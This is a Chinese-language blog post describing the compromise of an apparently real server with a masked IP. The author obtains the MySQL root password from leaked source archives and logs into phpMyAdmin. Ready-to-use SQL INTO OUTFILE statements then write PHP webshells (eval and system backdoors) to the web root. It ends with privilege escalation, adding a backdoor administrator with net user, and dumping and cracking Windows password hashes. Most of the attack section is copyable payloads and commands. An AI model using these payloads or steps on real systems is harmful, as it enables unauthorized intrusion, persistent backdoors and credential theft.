PhpMyadmin利用Mysql root密码获取webshell

最新推荐文章于 2022-11-03 15:00:25 发布
最新推荐文章于 2022-11-03 15:00:25 发布
阅读量934 收藏 3
点赞数
分类专栏: 安全技术研究 文章标签: 攻防实战 phpmyadmin mysql webshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44023460/article/details/84898790
版权

Simeon
Phpmyadmin是一款著名的mysql在线管理系统,通过提供的mysql数据库用户账号和密码对所管理的数据库实施操作。在渗透过程中,一旦获取其mysql账号和对应的密码,轻者获取其账号所管理数据库,重者可以配合其它漏洞获取webshell权限和系统权限。Root账号及口令可以通过暴力破解,源代码泄露等途径获取,本文主要就其root账号获取以及phpmyadmin的利用、如何导出webshell等进行探讨。
Mysql root账号及密码在phpmyadmin中的利用思路主要有以下几个方面:
(1)获取所有数据库中敏感表中的内容。例如涉及系统配置的表,涉及CMS管理的各种管理员表以及用户账号的表。通过这些表获取管理员账号和密码,各种配置信息。
(2)获取网站的真实物理路径。网站的真实物理路径主要用来导出webshell,其方法主要有程序报错、phpinfo函数、程序配置表等。
(3)通过查询语句直接将一句话后门导入到网站目录或者phpmyadmin所在目录。
(4)获取webshell后,如果是windows系统则可以尝试进行提权。
(5)有些网站可能前期被渗透过,网站可能有webshell,特别是一句话后门,如果有后门则可以通过一句话后门暴力破解获取。
(6)无法获取网站的真实路径情况下,则意味着无法直接导出一句话webshell,可以通过CMS系统管理账号登录系统后,寻找漏洞来突破,例如dedecms则可以通过破解管理员账号后直接上传文件来获取webshell。
(7)如果目标不仅仅是一个网站,则可以通过分析获取的密码信息对相邻或者已知目标系统进行渗透利用,例如扫描SSH口令、Mysql口令等。
(8)很多提供phpmyadmin的网站往往会存在目录泄露和代码泄露等漏洞,通过泄露的代码来获取数据库口令,审计泄露代码获取漏洞并利用。
(9)phpmyadmin某些版本存在远程执行以及包含等漏洞,可以通过这些漏洞直接获取webshell。
下面是一个实际利用的实例。
1.对IP所在端口进行全端口扫描
在Nmap中输入IP地址,选择“Intense scan,all Tcp port”,扫描结果显示该IP开放了135、1026、3306、3389、80等端口,详细端口开放情况如图1所示,在实际渗透过程中可以在浏览器中对逐个端口进行一一访问,当然一些比较明显的端口就不用测试了。有些服务器为了提供多个服务,有时候会开放多个端口,端口越多意味着可以利用的漏洞也就越多。
在这里插入图片描述
图1端口开放情况
2.对IP地址进行域名反查
将该IP在域名反查网站中进行查询,如图2所示,显示该IP存在3个网站。
在这里插入图片描述
图2域名反查
3.对网站IP进行访问
在浏览器中直接输入该IP进行访问,发下该IP下存在phpmyadmin目录、源代码、数据库备份文件等,如图3所示。其中可下载文件列表:

http://182.xx.xxx.16/mxsy_newzs.sql
http://182.xx.xxx.16/szcmsw.sql
http://182.xx.xxx.16/szcmsw11.sql
http://182.xx.xxx.16/hs.zip
http://182.xx.xxx.16/Z-BlogPHP_1_4_Deeplue_150101.zip

在这里插入图片描述
图3 服务器所在IP存在目录泄露等漏洞
4.获取数据库口令
分别下载网站泄露的压缩文件和数据库文件,下载文件后将压缩文件进行解压,然后寻找数据库配置文件。解压hs.zip后,在其data目录下的common.inc.php文件中获取了其数据库配置,如图4所示,但很明显该密码不是真正的数据库密码,应该是某一个cms的源代码程序包。继续对每一个泄露的目录进行访问,发现szcms1目录下还存rar文件,http://182.xx.xxx.16/szcms1/szcms.rarhttp://182.xx.xxx.16/szcms1/szcms1.rar如图5所示。将其下载后进行解压缩,成功找到数据库配置文件。
在这里插入图片描述
图4获取数据库配置文件内容
在这里插入图片描述
图5再次发现泄露源代码压缩文件
5.登录phpmyadmin
使用在前面szcms1.rar中获取的root账号密码进行登录,如图6所示成功登录,可以看到该mysql数据库中共有7个有用的数据库。可以选择数据库,然后选择“导出”,将指定数据库导出到本地(传说中的脱裤,尽量别干!)。
在这里插入图片描述
图6登录phpmyadmin
6.导出一句话后门到服务器
目前导出一句话后门的方法有以下几种:
(1)创建表方式

CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );
INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>');
SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'd:/www/exehack.php';
DROP TABLE IF EXISTS `darkmoon`;
上面代码是在mysql数据库中创建darkmoon表,然后加入一个名字为darkmoon1的字段,并在darkmoon1的字段中插入一句话代码,然后从darkmoon1字段里面导出一句话到网站的真实路径“C:/WWW/szcms1/szcms/Public/”,最后就是删除darkmoon这个表。 
注意:在使用以上代码时必须选择mysql数据库,并在phpMyAdmin中选择SQL,然后执行以上代码即可。需要修改的地方是网站的真实路径和文件名称“C:/WWW/szcms1/szcms/Public/ exehack.php”

(2)直接导出一句话后门文件
select '<?php @eval($_POST[pass]);?>'INTO OUTFILE ‘d:/www/p.php’
如果显示结果类似“您的 SQL 语句已成功运行 ( 查询花费 0.0006 秒 )”表明后门文件生成成功。
(3)直接执行命令权限的shell

select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/cmd.php'

该方法导出成功后可以直接执行DOS命令,使用方法:www.xxx.com/cmd.php?cmd=(cmd=后面直接执行dos命令)。
在本例中执行导出脚本语句后,网站给挂了,访问不了服务器这比较郁闷,尝试通过mysql数据库客户端连接工具“Navicat for MySQL”,新建一个连接,将ip地址等信息全部输入“Navicat for MySQL”中,成功连接,如图7说是。运气真好!
在这里插入图片描述
图7使用Navicat for MySQL连接mysql数据库
通过访问http://182.xx.xxx.16/szcms1/szcms/Public/Home/images/micro_r4_c2.png来获取网站的真实物理路径C:\WWW\szcms1\szcms\Tp\,如图8所示。
在这里插入图片描述
图8获取真实路径
然后在mysql数据库中分别执行:

CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );
INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>');
SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE 'C:/WWW/szcms1/szcms/Public/exehack.php';
DROP TABLE IF EXISTS `darkmoon`;
对导出的webshell在网站进行访问测试,如图9所示,如果没有显示错误,则表示可以运行,在中国菜刀一句话后门管理中添加该地址直接获取webshell,如图10所示。

在这里插入图片描述
图9通过目录泄露漏洞查看文件是否导出成功
在这里插入图片描述
图10获取webshell
9.服务器提权
(1)wce直接获取明文密码失败
通过中国菜刀队远程终端命令,直接在其中执行命令,执行whoami命令显示为系统权限,上传wce64.exe并执行“wce64 -w”获取当前登录明文密码,如图11所示,结果未能获取密码,直接获取明文密码失败。
在这里插入图片描述
图11执行命令
(2)直接添加管理员
在前面的端口扫描中显示该服务器开启了3389端口,既然webshell可以执行命令,直接执行“net user temp temp2005 /add”和“ net localgroup administrators temp /add”命令添加一个管理员用户temp,密码为temp2005,如图12所示成功添加temp用户到管理员组中。
在这里插入图片描述
图12添加temp用户到管理员组
(3)登录3389
在本地打开mstsc.exe直接输入用户名和密码进行登录,如图13所示成功登录该服务器。
在这里插入图片描述
图13成功登录该服务器
(4)获取管理员密码hash和明文
登录服务器后,通过浏览器下载一个saminside程序,如图14所示,直接获取系统的hash值。将该哈希值导出到本地,通过ophcrack程序进行破解。
在这里插入图片描述
图14获取系统hash值
然后再次上传一个wce64修改版本,免输入一键获取密码,如图15所示,成功获取adminstrator的密码“123321abc*”。
在这里插入图片描述
图15获取系统管理员密码
11.总结与讨论
系统一个小小的失误,再加上一些偶然的因素,就导致一个系统被渗透,并获取了服务器权限,windows下apache+mysql+php架构如果权限设置不当,绝大部分都是system权限,在获取webshell的情况下99%都可以获取system权限。在本文中对网站开放phpmyadmin的情况下获取webshell的思路、导出webshell的方法等进行探讨。
更多攻防内容请欢迎访问本人在csdn上面创造的个人专栏:
密码安全攻防技术精讲》:https://gitbook.cn/gitchat/column/5afbf24f753289354cab7983

我是simeon
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
使用phpMyAdmin修改MySQL数据库root用户密码的方法
09-10
本教程将详述如何使用phpMyAdmin这一流行的Web界面工具来修改MySQLroot用户密码。 首先,确保你已经安装了phpMyAdmin并且能够正常访问。phpMyAdmin是一个基于WebMySQL数据库管理工具,它提供了图形化的界面,...
手动配置phpmyadminmysql密码的两种方案
12-15
本文将详细介绍如何手动配置phpmyadminMySQL密码的两种方案,确保您的系统安全无虞。 ### 方案一:通过MySQL命令行修改密码 1. **登录MySQL**:打开终端或命令提示符,输入`mysql -u root -p`,然后按回车,输入...
利用Mysql root帐号获取某Linux操作系统网站webshell
weixin_44023460的博客
12-08 2528
利用Mysql root帐号获取某Linux操作系统网站webshell simeon 获取Webshell,网上有很多文章,本文是phpMyAdmin漏洞利用与防范专题中的一个研究课题,其主要环境是在有Mysql数据库root帐号密码权限的基础下,如何通过技术手段获取Linux操作系统上建立的网站系统的webshell权限。 1.漏洞利用思路 1.1Mysql root帐号密码获取思路 (1)通...
***学习笔记--场景篇--通过mysqlroot账号来get shell
weixin_33815613的博客
12-13 182
场景介绍: 今天的场景是前一周在内网***的时候遇到过的,找到一个mysql数据库弱口令。 账号和密码分别是root,也就是mysql中的dba。 这里其实权限很大了,首先mysqlroot用户具有文件写权限,同时mysql5.0以上,提供一个system函数,而这个函数通常被***者用作shell的接口。 那时在遇到这个弱口令时,我...
Mysql root账号general_log_file方法获取webshell
weixin_44023460的博客
12-08 358
Mysql root账号general_log_file方法获取webshell by antian365.com simeon 在前面的phpmyadmin漏洞利用专题中介绍了如何通过root账号来获取webshell,但在现实情况中,由于Mysql版本较高以及配置文件的缘故,往往无法直接通过root账号写入网站真实路劲下获取webshell;通过研究发现其实可以通过一些方法绕过,同样可以获取w...
MySql修改密码phpMyAdmin无法登陆的解决方法
12-16
在使用WAMP集成服务器时,有时我们可能会遇到在MySQL修改管理员root用户的密码后,phpMyAdmin无法正常登录的问题。这主要是因为phpMyAdmin的配置文件`config.inc.php`中的密码未与新设置的MySQL密码同步导致的。下面...
phpmyadmin更改mysql5.0登录密码
10-30
不过总算把算服务器的MYSQL登录密码PHPMYADMIN的远程访问方式改好了。MYSQL自4.1起就更改了加密方式,讲原先16位的加密改成40位,把我害苦了,怎么都连接不上。查遍资料今天总算搞定了通过PHPMYADMIN更改MYSQL密码...
PhpMyadmin后台拿webshell方法总结
浅笑996的博客
06-29 3744
前言: phpmyadmin后台拿webshell的方法主要分为两个方法: (1) 、通过日志文件拿webshell; (2) 、利用日志文件写入一句话;(这个方法可能在实际操作中会遇到困难); 本地搭建环境: Phpmystudy 2018 PHP--5.5.38 一、日志文件写入一句话来获取webshell: (1) 、首先我们先利用日志文件写入一句话来获取webshell,日志文件写入的思路利用mysql的一个日志文件。我们执行的每一个sql语句都会被保存到日志中,换个思路想一下把这个
php mysql 软件直接连接脱裤
09-14
php mysql 软件直接连接脱裤,秒连接,过任何杀软,可以拖10T以上数据库
使用phpmyadmin来更改root密码
小米哥的专栏
03-13 1303
使用phpmyadmin来更改root密码。   使用phpmyadmin(我这里用的是mysql3.5.1版本)来更改Mysqlroot密码非常方便, 安装配置好phpmyadmin后,首先登陆管理界面,点击右侧导航栏中的用户按钮,对数据库中的用户进行管理。 点击用户按钮后,出现用户列表: 点击“编辑权限”按钮,进入编辑用户信息页面:    输入你要修
上传webshell获取数据库密码
qq_43776408的博客
05-20 1149
因为此处用的菜刀是java的 所以你要搭建java环境 然后通过xshell上传菜刀 上传完之后,由于你上传的是jar文件 所以打开方式要注意 菜刀让你填密码 这个密码就是你在一开始上传上去的 回去看 点击添加 成功 最后我们上传webshell 上传成功后可以在任何机器访问shell 如果我们想要知道数据库密码 先找到config目录 下面有一个文件叫config_global,打开它。里面就有密码 结束 ...
如何知道XAMPP 中phpmyadmin 的“用户名”和“密码
最新发布
zhishifufei的博客
11-03 804
在这种情况下,适用于 Microsoft Windows 操作系统。 1.在“xampp”文件夹中,你会发现文件夹是“phpmyadmin”。 2.在“phpmyadmin”文件夹中,尝试检查“config.inc.php”文件,并打开该文件。3.打开“config.inc.php”后,可以看到“用户名”和“密码”如下代码
忘记phpMyAdmin的登录密码怎么办?
热门推荐
batoom的专栏
05-02 3万+
马有失前蹄日,人有忘密码时,网上冲浪,到处都是用户名和密码密码一多总有忘记一两个的时候 对于本地的本地的phpMyAdmin,忘记登录密码怎么办哪?看看下文,能省去你不少时间和精力。 首先进入DOS,开一个cmd c:\>sc stop mysql 进到目录里面 cd C:\xampp\mysql\bin   解释一下 C:\xampp\mysql\bin 路径要改成你自己的 下同 C
MySQL获取PHP webshell
qq_43592364的博客
01-18 2145
在渗透测试中,希望通过MySQL获取webshell需要满足以下几个条件: 1、对web目录有写权限 2、GPC关闭(是否对单引号进行转义) 3、知道服务器的绝对路径 4、secure-file-priv为打开的状态 至少要满足以上4个条件,才能顺利通过MySQL获取webshell 接下来,为了能够模拟出渗透这一个过程,使用dvwa靶场来进行模拟(当然相比于真正的时间,中间会省...
mysqlwebshell总结
weixin_33795833的博客
10-24 229
1、select '<?php eval($_POST[jumbo]) ?>' into outfile '/var/www/jumbo.php'; 2、select '<?php eval($_POST[jumbo]) ?>' into dumpfile '/var/www/jumbo.php'; 3、Drop TABLE IF EXISTS temp;Creat...
MySQL导出一句话拿WebShell的方法
weixin_30885111的博客
04-20 126
叶子's blog 文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段Insert INTO temp (cmd) VALUES('<? php eva...
Linux环境的webshell下备份数据库打包网站
weixin_33860553的博客
11-19 221
备份数据库mysqldump -u用户名 -p密码 数据库 > /Dir/sql.bak 备份表:mysqldump -u用户名 -p密码 数据库 表 > /Dir/biao.bak 备份字段: select * from admin > /Dir/ziduan.txt 备份网站: Rar a wangzhan.rar /打包目录/ ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我是simeon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值